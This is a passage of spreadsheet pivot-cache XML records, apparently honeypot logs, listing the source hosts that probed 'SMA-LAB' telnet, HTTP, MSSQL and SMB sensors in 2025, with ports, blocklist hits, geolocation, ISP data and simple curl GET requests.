v="SMA-LAB_DNS_H19&amp;&amp;SMA-LAB_MT-CPA_H20&amp;&amp;SMA-LAB_DHCP_H20&amp;&amp;SMA-LAB_MT-CPA_H34&amp;&amp;SMA-LAB_HTTP_H22&amp;&amp;SMA-LAB_HTTP_H17&amp;&amp;SMA-LAB_HTTP_H21&amp;&amp;SMA-LAB_HTTP_H7&amp;&amp;SMA-LAB_TELNET_H31&amp;&amp;SMA-LAB_TELNET_H8&amp;&amp;SMA-LAB_TELNET_H30&amp;&amp;SMA-LAB_TELNET_H19&amp;&amp;SMA-LAB_TELNET_H12&amp;&amp;SMA-LAB_TELNET_H44&amp;&amp;SMA-LAB_TELNET_H15&amp;&amp;SMA-LAB_TELNET_H45&amp;&amp;SMA-LAB_TELNET_H17&amp;&amp;SMA-LAB_TELNET_H9&amp;&amp;SMA-LAB_TELNET_H14&amp;&amp;SMA-LAB_TELNET_H33&amp;&amp;SMA-LAB_TELNET_H5&amp;&amp;SMA-LAB_TELNET_H16&amp;&amp;SMA-LAB_TELNET_H27&amp;&amp;SMA-LAB_TELNET_H40&amp;&amp;SMA-LAB_TELNET_H7&amp;&amp;SMA-LAB_TELNET_H39&amp;&amp;SMA-LAB_TELNET_H34&amp;&amp;SMA-LAB_TELNET_H18&amp;&amp;SMA-LAB_TELNET_H24&amp;&amp;SMA-LAB_HTTP_H11&amp;&amp;SMA-LAB_TELNET_H26&amp;&amp;SMA-LAB_TELNET_H41&amp;&amp;SMA-LAB_TELNET_H10&amp;&amp;SMA-LAB_TELNET_H22&amp;&amp;SMA-LAB_TELNET_H11&amp;&amp;SMA-LAB_TELNET_HC1&amp;&amp;SMA-LAB_TELNET_H20"/>
    <s v="53&amp;&amp;137&amp;&amp;67&amp;&amp;3672&amp;&amp;80&amp;&amp;23&amp;&amp;9100"/>
    <s v="True"/>
    <s v="{'all.s5h.net': ['unknown']}"/>
    <n v="28"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="['attack-source'&amp;&amp; 'attack-target:web']"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="TW"/>
    <s v="Taiwan"/>
    <s v="NA"/>
    <s v="Taiwan"/>
    <s v="Taipei City"/>
    <s v="Taipei"/>
    <s v="1668341"/>
    <s v="NA"/>
    <s v="25.0334"/>
    <s v="121.566"/>
    <s v="3462"/>
    <s v="Chunghwa Telecom Co., Ltd."/>
    <s v="Chunghwa Telecom Co., Ltd."/>
    <s v="business"/>
    <s v="Chunghwa Telecom Co. Ltd."/>
    <s v="2010-05-05"/>
    <s v="HINET-NET"/>
    <s v="None"/>
    <s v="connection&amp;&amp;login&amp;&amp;GET"/>
    <s v="NA&amp;&amp;{Data_TELNET:NA}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '194.233.76.135:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTP:NA}&amp;&amp;{Data_PJL:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:122:fe15"/>
    <s v="C-I_D"/>
    <s v="high"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="3656"/>
    <x v="3656"/>
    <s v="p13836160-ipxg46701marunouchi.tokyo.ocn.ne.jp"/>
    <x v="0"/>
    <d v="2025-04-01T23:39:48"/>
    <d v="2025-04-01T23:39:48"/>
    <d v="2025-04-01T23:39:48"/>
    <n v="1"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="low"/>
    <s v="SMA-LAB_TELNET_HC1"/>
    <s v="23"/>
    <s v="False"/>
    <s v="NA"/>
    <n v="0"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="JP"/>
    <s v="Japan"/>
    <s v="13"/>
    <s v="Tokyo"/>
    <s v="Chiyoda"/>
    <s v="Chiyoda (Marunouchi)"/>
    <s v="11749713"/>
    <s v="100-0000"/>
    <s v="35.6804"/>
    <s v="139.766"/>
    <s v="4713"/>
    <s v="OCN NTT Communications Corporation"/>
    <s v="NTT Communications Corporation"/>
    <s v="corporate"/>
    <s v="Open Computer Network"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="connection"/>
    <s v="{Data_TELNET:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="['ns1.ocn.ad.jp', 'ns2.ocn.ad.jp']"/>
    <s v="NA"/>
    <s v="Connected (2025/11/30)"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:99b1:7ca0"/>
    <s v="C-I_D"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="3657"/>
    <x v="3657"/>
    <s v="114-33-81-189.hinet-ip.hinet.net&amp;&amp;NA"/>
    <x v="0"/>
    <d v="2025-04-01T23:37:14"/>
    <d v="2024-09-11T17:49:00"/>
    <d v="2025-04-01T23:37:14"/>
    <n v="381"/>
    <s v="SQTK_GTDN"/>
    <s v="['attack-source'&amp;&amp; 'attack-target:web'&amp;&amp; 'attack-target:ssh']&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="low"/>
    <s v="SMA-LAB_DNS_H19&amp;&amp;SMA-LAB_MT-CPA_H20&amp;&amp;SMA-LAB_DHCP_H20&amp;&amp;SMA-LAB_SSH_H42&amp;&amp;SMA-LAB_TELNET_H18&amp;&amp;SMA-LAB_TELNET_H3&amp;&amp;SMA-LAB_TELNET_HC1&amp;&amp;SMA-LAB_TELNET_H26&amp;&amp;SMA-LAB_TELNET_H33&amp;&amp;SMA-LAB_TELNET_H46&amp;&amp;SMA-LAB_TELNET_H32&amp;&amp;SMA-LAB_TELNET_H34&amp;&amp;SMA-LAB_MT-CPA_H31&amp;&amp;SMA-LAB_TELNET_H35&amp;&amp;SMA-LAB_TELNET_H13&amp;&amp;SMA-LAB_TELNET_H10&amp;&amp;SMA-LAB_TELNET_H16&amp;&amp;SMA-LAB_TELNET_H41&amp;&amp;SMA-LAB_TELNET_H45&amp;&amp;SMA-LAB_TELNET_H47&amp;&amp;SMA-LAB_TELNET_H22&amp;&amp;SMA-LAB_TELNET_H17&amp;&amp;SMA-LAB_TELNET_H12&amp;&amp;SMA-LAB_TELNET_H15&amp;&amp;SMA-LAB_TELNET_H29&amp;&amp;SMA-LAB_TELNET_H8&amp;&amp;SMA-LAB_TELNET_H44&amp;&amp;SMA-LAB_TELNET_H20&amp;&amp;SMA-LAB_TELNET_H24"/>
    <s v="53&amp;&amp;137&amp;&amp;67&amp;&amp;22&amp;&amp;23&amp;&amp;18125&amp;&amp;9100&amp;&amp;NA&amp;&amp;80"/>
    <s v="True"/>
    <s v="{'all.s5h.net': ['unknown']}"/>
    <n v="28"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="['attack-source'&amp;&amp; 'attack-target:web'&amp;&amp; 'attack-target:ssh']"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="TW"/>
    <s v="Taiwan"/>
    <s v="NA"/>
    <s v="Taiwan"/>
    <s v="Taipei City"/>
    <s v="Taipei"/>
    <s v="1668341"/>
    <s v="NA"/>
    <s v="25.0334"/>
    <s v="121.566"/>
    <s v="3462"/>
    <s v="Chunghwa Telecom Co., Ltd."/>
    <s v="Chunghwa Telecom Co., Ltd."/>
    <s v="business"/>
    <s v="Chunghwa Telecom Co. Ltd."/>
    <s v="2008-04-18"/>
    <s v="HINET-NET"/>
    <s v="None"/>
    <s v="connection&amp;&amp;login&amp;&amp;NA&amp;&amp;GET"/>
    <s v="NA&amp;&amp;{Data_TELNET:NA}&amp;&amp;{Data_PJL:NA}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '194.4.48.242:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTP:NA}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '194.233.76.135:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}"/>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None"/>
    <x v="31"/>
    <s v="NA"/>
    <s v="None"/>
    <s v="::ffff:7221:51bd"/>
    <s v="C-I_D"/>
    <s v="high"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="3658"/>
    <x v="3658"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-01T23:36:56"/>
    <d v="2025-03-31T08:49:02"/>
    <d v="2025-04-01T23:36:56"/>
    <n v="2"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="high"/>
    <s v="SMA-LAB_TELNET_H13&amp;&amp;SMA-LAB_TELNET_HC1"/>
    <s v="23"/>
    <s v="False"/>
    <s v="NA"/>
    <n v="0"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="NA"/>
    <s v="North America"/>
    <s v="MX"/>
    <s v="Mexico"/>
    <s v="SON"/>
    <s v="Sonora"/>
    <s v="Hermosillo Municipality"/>
    <s v="Hermosillo"/>
    <s v="4004898"/>
    <s v="NA"/>
    <s v="29.1026"/>
    <s v="-110.977"/>
    <s v="8151"/>
    <s v="Uninet S.A. de C.V."/>
    <s v="UNINET"/>
    <s v="residential"/>
    <s v="Gestión de direccionamiento UniNet"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="connection"/>
    <s v="{Data_TELNET:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:bdad:6f6e"/>
    <s v="C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="3659"/>
    <x v="3659"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-01T22:55:57"/>
    <d v="2025-04-01T22:53:17"/>
    <d v="2025-04-01T22:55:57"/>
    <n v="4"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="high"/>
    <s v="SMA-LAB_TELNET_HC1"/>
    <s v="23"/>
    <s v="True"/>
    <s v="{'b.barracudacentral.org': ['unknown']}"/>
    <n v="39"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="IN"/>
    <s v="India"/>
    <s v="MH"/>
    <s v="Maharashtra"/>
    <s v="Mumbai Suburban"/>
    <s v="Mumbai"/>
    <s v="1275339"/>
    <s v="400001"/>
    <s v="19.076"/>
    <s v="72.8777"/>
    <s v="9829"/>
    <s v="Bharat Sanchar Nigam Ltd"/>
    <s v="MTNL Mumbai"/>
    <s v="business"/>
    <s v="Mahanagar Telephone Nigam Limited"/>
    <s v="2004-11-30"/>
    <s v="MTNL"/>
    <s v="None"/>
    <s v="connection"/>
    <s v="{Data_TELNET:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:3bb8:fd96"/>
    <s v="C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="3660"/>
    <x v="3660"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-01T22:52:24"/>
    <d v="2025-04-01T22:52:24"/>
    <d v="2025-04-01T22:52:24"/>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harat Sanchar Nigam Ltd"/>
    <s v="consumer"/>
    <s v="BB Multiplay"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="connection"/>
    <s v="{Data_TELNET:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:75d6:c39b"/>
    <s v="C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="3661"/>
    <x v="3661"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-01T22:51:28"/>
    <d v="2025-04-01T22:51:28"/>
    <d v="2025-04-01T22:51:28"/>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e:c498"/>
    <s v="C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="3662"/>
    <x v="3662"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-01T22:47:03"/>
    <d v="2024-10-28T09:30:38"/>
    <d v="2025-04-01T22:47:03"/>
    <n v="154"/>
    <s v="SQTK_GTDN"/>
    <s v="['attack-source'&amp;&amp; 'attack-target:web']&amp;&amp;Anonymous Behaviour Observed&amp;&amp;Untrusted Traffic"/>
    <s v="low"/>
    <s v="SMA-LAB_DNS_H19&amp;&amp;SMA-LAB_MT-CPA_H20&amp;&amp;SMA-LAB_DHCP_H20&amp;&amp;SMA-LAB_MT-CPA_H31&amp;&amp;SMA-LAB_MSSQL_H7&amp;&amp;SMA-LAB_MSSQL_H32&amp;&amp;SMA-LAB_MSSQL_H34&amp;&amp;SMA-LAB_MT-CPA_H34&amp;&amp;SMA-LAB_MSSQL_HC1&amp;&amp;SMA-LAB_MT-CPA_H7&amp;&amp;SMA-LAB_MSSQL_H9"/>
    <s v="53&amp;&amp;137&amp;&amp;67&amp;&amp;58181&amp;&amp;58197&amp;&amp;58215&amp;&amp;1433&amp;&amp;54049&amp;&amp;54063&amp;&amp;54092&amp;&amp;62838&amp;&amp;63276&amp;&amp;63950&amp;&amp;63964&amp;&amp;63995&amp;&amp;64014&amp;&amp;64086&amp;&amp;64057&amp;&amp;64105"/>
    <s v="False"/>
    <s v="NA"/>
    <n v="0"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="ID"/>
    <s v="Indonesia"/>
    <s v="JB"/>
    <s v="West Java"/>
    <s v="Kota Bandung"/>
    <s v="Bandung"/>
    <s v="1650357"/>
    <s v="NA"/>
    <s v="-6.91746"/>
    <s v="107.619"/>
    <s v="23949"/>
    <s v="PT Comtronics Systems"/>
    <s v="COMNET"/>
    <s v="business"/>
    <s v="NA"/>
    <s v="2013-04-17"/>
    <s v="COMNET-ID"/>
    <s v="None"/>
    <s v="connection"/>
    <s v="NA&amp;&amp;{Data_MSSQl:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:6718:942b"/>
    <s v="None&amp;&amp;C-I"/>
    <s v="high&amp;&amp;low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="3663"/>
    <x v="3663"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-01T22:43:00"/>
    <d v="2025-04-01T22:43:00"/>
    <d v="2025-04-01T22:43:00"/>
    <n v="1"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="low"/>
    <s v="SMA-LAB_TELNET_HC1"/>
    <s v="23"/>
    <s v="False"/>
    <s v="NA"/>
    <n v="0"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="IN"/>
    <s v="India"/>
    <s v="DL"/>
    <s v="Delhi"/>
    <s v="New Delhi"/>
    <s v="New Delhi (Block N)"/>
    <s v="1261481"/>
    <s v="110001"/>
    <s v="28.6309"/>
    <s v="77.2229"/>
    <s v="9829"/>
    <s v="BSNL-NIB"/>
    <s v="BSNL Internet"/>
    <s v="corporate"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="connection"/>
    <s v="{Data_TELNET:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:75eb:d6c7"/>
    <s v="C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="3664"/>
    <x v="3664"/>
    <s v="node-bw7.pool-101-108.dynamic.totinternet.net"/>
    <x v="0"/>
    <d v="2025-04-01T22:37:37"/>
    <d v="2025-04-01T22:37:37"/>
    <d v="2025-04-01T22:37:37"/>
    <n v="1"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="low"/>
    <s v="SMA-LAB_TELNET_HC1"/>
    <s v="23"/>
    <s v="False"/>
    <s v="NA"/>
    <n v="0"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="TH"/>
    <s v="Thailand"/>
    <s v="10"/>
    <s v="Bangkok"/>
    <s v="Lak Si"/>
    <s v="Khwaeng Thung Song Hong"/>
    <s v="1613187"/>
    <s v="NA"/>
    <s v="13.8983"/>
    <s v="100.582"/>
    <s v="23969"/>
    <s v="TOT-NET"/>
    <s v="TOT Public Company Limited"/>
    <s v="consumer"/>
    <s v="TOT Public Company Limited"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="connection"/>
    <s v="{Data_TELNET:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="2019-05-14 09:00:25"/>
    <s v="2026-05-14 09:00:25"/>
    <s v="2023-05-18 14:44:23"/>
    <s v="['CORA.NS.CLOUDFLARE.COM', 'PHIL.NS.CLOUDFLARE.COM']"/>
    <s v="GMO Internet, Inc."/>
    <s v="clientTransferProhibited https://icann.org/epp#clientTransferProhibited"/>
    <s v="Whois Privacy Protection Service by onamae.com"/>
    <x v="4"/>
    <s v="NA"/>
    <s v="['26-1 Sakuragaoka-cho', 'Cerulean Tower 11F']"/>
    <s v="::ffff:656c:3c37"/>
    <s v="C-I_D"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="3665"/>
    <x v="3665"/>
    <s v="59-126-129-172.hinet-ip.hinet.net&amp;&amp;NA"/>
    <x v="0"/>
    <d v="2025-04-01T22:25:20"/>
    <d v="2024-05-29T09:33:50"/>
    <d v="2025-04-01T22:25:20"/>
    <n v="692"/>
    <s v="SQTK_GTDN"/>
    <s v="['attack-source'&amp;&amp; 'attack-target:web']&amp;&amp;Anonymous Behaviour Observed&amp;&amp;Untrusted Traffic"/>
    <s v="low"/>
    <s v="SMA-LAB_DNS_H19&amp;&amp;SMA-LAB_MT-CPA_H20&amp;&amp;SMA-LAB_DHCP_H20&amp;&amp;SMA-LAB_DNS_H39&amp;&amp;SMA-LAB_MT-CPA_H21&amp;&amp;SMA-LAB_HTTP_H10&amp;&amp;SMA-LAB_TELNET_H28&amp;&amp;SMA-LAB_HTTP_H22&amp;&amp;SMA-LAB_TELNET_HC1&amp;&amp;SMA-LAB_TELNET_H34&amp;&amp;SMA-LAB_TELNET_H35&amp;&amp;SMA-LAB_TELNET_H22&amp;&amp;SMA-LAB_TELNET_H40&amp;&amp;SMA-LAB_TELNET_H10&amp;&amp;SMA-LAB_TELNET_H7&amp;&amp;SMA-LAB_TELNET_H15&amp;&amp;SMA-LAB_TELNET_H16&amp;&amp;SMA-LAB_TELNET_H21&amp;&amp;SMA-LAB_TELNET_H29&amp;&amp;SMA-LAB_TELNET_H8&amp;&amp;SMA-LAB_TELNET_H39&amp;&amp;SMA-LAB_TELNET_H25&amp;&amp;SMA-LAB_TELNET_H19&amp;&amp;SMA-LAB_TELNET_H24&amp;&amp;SMA-LAB_TELNET_H27&amp;&amp;SMA-LAB_TELNET_H46&amp;&amp;SMA-LAB_TELNET_H26&amp;&amp;SMA-LAB_TELNET_H14&amp;&amp;SMA-LAB_TELNET_H33&amp;&amp;SMA-LAB_TELNET_H31&amp;&amp;SMA-LAB_TELNET_H37&amp;&amp;SMA-LAB_TELNET_H18&amp;&amp;SMA-LAB_TELNET_H9&amp;&amp;SMA-LAB_TELNET_H12"/>
    <s v="53&amp;&amp;137&amp;&amp;67&amp;&amp;53&amp;&amp;57437&amp;&amp;80&amp;&amp;23&amp;&amp;NA&amp;&amp;19317&amp;&amp;48707&amp;&amp;22430&amp;&amp;40574&amp;&amp;9100"/>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2005-10-18"/>
    <s v="HINET-NET"/>
    <s v="None"/>
    <s v="connection&amp;&amp;login&amp;&amp;NA"/>
    <s v="NA&amp;&amp;{Data_TELNET:NA}&amp;&amp;{Data_PJL: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3b7e:81ac"/>
    <s v="C-I_D"/>
    <s v="high&amp;&amp;low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="3666"/>
    <x v="3666"/>
    <s v="NA&amp;&amp;114-34-30-130.hinet-ip.hinet.net"/>
    <x v="0"/>
    <d v="2025-04-01T22:25:08"/>
    <d v="2024-12-16T07:37:07"/>
    <d v="2025-04-01T22:25:08"/>
    <n v="229"/>
    <s v="SQTK_GTDN"/>
    <s v="['attack-source'&amp;&amp; 'attack-target:web']&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="low"/>
    <s v="SMA-LAB_TELNET_H29&amp;&amp;SMA-LAB_TELNET_H34&amp;&amp;SMA-LAB_TELNET_H44&amp;&amp;SMA-LAB_TELNET_H24&amp;&amp;SMA-LAB_TELNET_H32&amp;&amp;SMA-LAB_TELNET_H17&amp;&amp;SMA-LAB_TELNET_H15&amp;&amp;SMA-LAB_TELNET_H16&amp;&amp;SMA-LAB_TELNET_H26&amp;&amp;SMA-LAB_HTTP_H22&amp;&amp;SMA-LAB_TELNET_HC1&amp;&amp;SMA-LAB_TELNET_H14&amp;&amp;SMA-LAB_TELNET_H23&amp;&amp;SMA-LAB_TELNET_H45&amp;&amp;SMA-LAB_TELNET_H13&amp;&amp;SMA-LAB_TELNET_H36"/>
    <s v="23&amp;&amp;80&amp;&amp;9100&amp;&amp;60319"/>
    <s v="False"/>
    <s v="NA"/>
    <n v="0"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="['attack-source'&amp;&amp; 'attack-target:web']"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="TW"/>
    <s v="Taiwan"/>
    <s v="NA"/>
    <s v="Taiwan"/>
    <s v="Taipei City"/>
    <s v="Taipei"/>
    <s v="1668341"/>
    <s v="NA"/>
    <s v="25.0334"/>
    <s v="121.566"/>
    <s v="3462"/>
    <s v="Chunghwa Telecom Co., Ltd."/>
    <s v="Chunghwa Telecom Co., Ltd."/>
    <s v="business"/>
    <s v="Chunghwa Telecom Co. Ltd."/>
    <s v="2008-04-18"/>
    <s v="HINET-NET"/>
    <s v="None"/>
    <s v="connection&amp;&amp;login&amp;&amp;NA"/>
    <s v="NA&amp;&amp;{Data_TELNET:NA}&amp;&amp;{Data_PJL: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7222:1e82"/>
    <s v="C-I_D"/>
    <s v="high"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="3667"/>
    <x v="3667"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-01T22:14:03"/>
    <d v="2024-12-03T02:42:53"/>
    <d v="2025-04-01T22:14:03"/>
    <n v="11"/>
    <s v="SQTK_GTDN"/>
    <s v="HoneyPot BlackListed IP&amp;&amp;Anonymous Behaviour Observed&amp;&amp;Untrusted Traffic"/>
    <s v="low"/>
    <s v="SMA-LAB_MSSQL_HC1&amp;&amp;SMA-LAB_SMB_H43"/>
    <s v="1433&amp;&amp;445"/>
    <s v="True"/>
    <s v="{'dnsbl-2.uceprotect.net': ['unknown']}"/>
    <n v="39"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="IN"/>
    <s v="India"/>
    <s v="MH"/>
    <s v="Maharashtra"/>
    <s v="Mumbai Suburban"/>
    <s v="Mumbai"/>
    <s v="1275339"/>
    <s v="400001"/>
    <s v="19.076"/>
    <s v="72.8777"/>
    <s v="24560"/>
    <s v="Bharti Airtel Limited"/>
    <s v="Bharti Airtel"/>
    <s v="cellular"/>
    <s v="Bharti Cellular limited"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="login&amp;&amp;connection"/>
    <s v="{Data_MSSQl:NA}&amp;&amp;{Data_SMB:Incoming connection (223.184.0.95,52670)}&amp;&amp;{Data_SMB:Incoming connection (223.184.0.95,53317)}&amp;&amp;{Data_SMB:User . authenticated successfully (basic)}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:dfb8:5f"/>
    <s v="None&amp;&amp;C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="3668"/>
    <x v="3668"/>
    <s v="122-116-158-160.hinet-ip.hinet.net&amp;&amp;NA"/>
    <x v="0"/>
    <d v="2025-04-01T22:06:12"/>
    <d v="2024-05-29T09:33:50"/>
    <d v="2025-04-01T22:06:12"/>
    <n v="379"/>
    <s v="SQTK_GTDN"/>
    <s v="['attack-source'&amp;&amp; 'attack-target:web'&amp;&amp; 'attack-target:ssh']&amp;&amp;Anonymous Behaviour Observed&amp;&amp;Untrusted Traffic"/>
    <s v="low"/>
    <s v="SMA-LAB_DNS_H19&amp;&amp;SMA-LAB_MT-CPA_H20&amp;&amp;SMA-LAB_DHCP_H20&amp;&amp;SMA-LAB_HTTP_H5&amp;&amp;SMA-LAB_DNS_H30&amp;&amp;SMA-LAB_MT-CPA_H34&amp;&amp;SMA-LAB_TELNET_H14&amp;&amp;SMA-LAB_TELNET_H37&amp;&amp;SMA-LAB_TELNET_H39&amp;&amp;SMA-LAB_TELNET_H47&amp;&amp;SMA-LAB_TELNET_H26&amp;&amp;SMA-LAB_TELNET_H19&amp;&amp;SMA-LAB_TELNET_HC1&amp;&amp;SMA-LAB_TELNET_H7&amp;&amp;SMA-LAB_TELNET_H27&amp;&amp;SMA-LAB_TELNET_H24&amp;&amp;SMA-LAB_TELNET_H16&amp;&amp;SMA-LAB_TELNET_H15&amp;&amp;SMA-LAB_TELNET_H21&amp;&amp;SMA-LAB_TELNET_H38&amp;&amp;SMA-LAB_TELNET_H28&amp;&amp;SMA-LAB_TELNET_H41&amp;&amp;SMA-LAB_TELNET_H46"/>
    <s v="53&amp;&amp;137&amp;&amp;67&amp;&amp;80&amp;&amp;53&amp;&amp;22589&amp;&amp;23&amp;&amp;9100&amp;&amp;64897"/>
    <s v="False"/>
    <s v="NA"/>
    <n v="0"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="TW"/>
    <s v="Taiwan"/>
    <s v="NA"/>
    <s v="Taipei"/>
    <s v="New Taipei"/>
    <s v="Yingge District"/>
    <s v="1665491"/>
    <s v="NA"/>
    <s v="24.9561"/>
    <s v="121.351"/>
    <s v="3462"/>
    <s v="Chunghwa Telecom Co., Ltd."/>
    <s v="Chunghwa Telecom Co., Ltd."/>
    <s v="business"/>
    <s v="Chunghwa Telecom Co. Ltd."/>
    <s v="2006-07-31"/>
    <s v="HINET-NET"/>
    <s v="None"/>
    <s v="connection&amp;&amp;login&amp;&amp;GET&amp;&amp;NA"/>
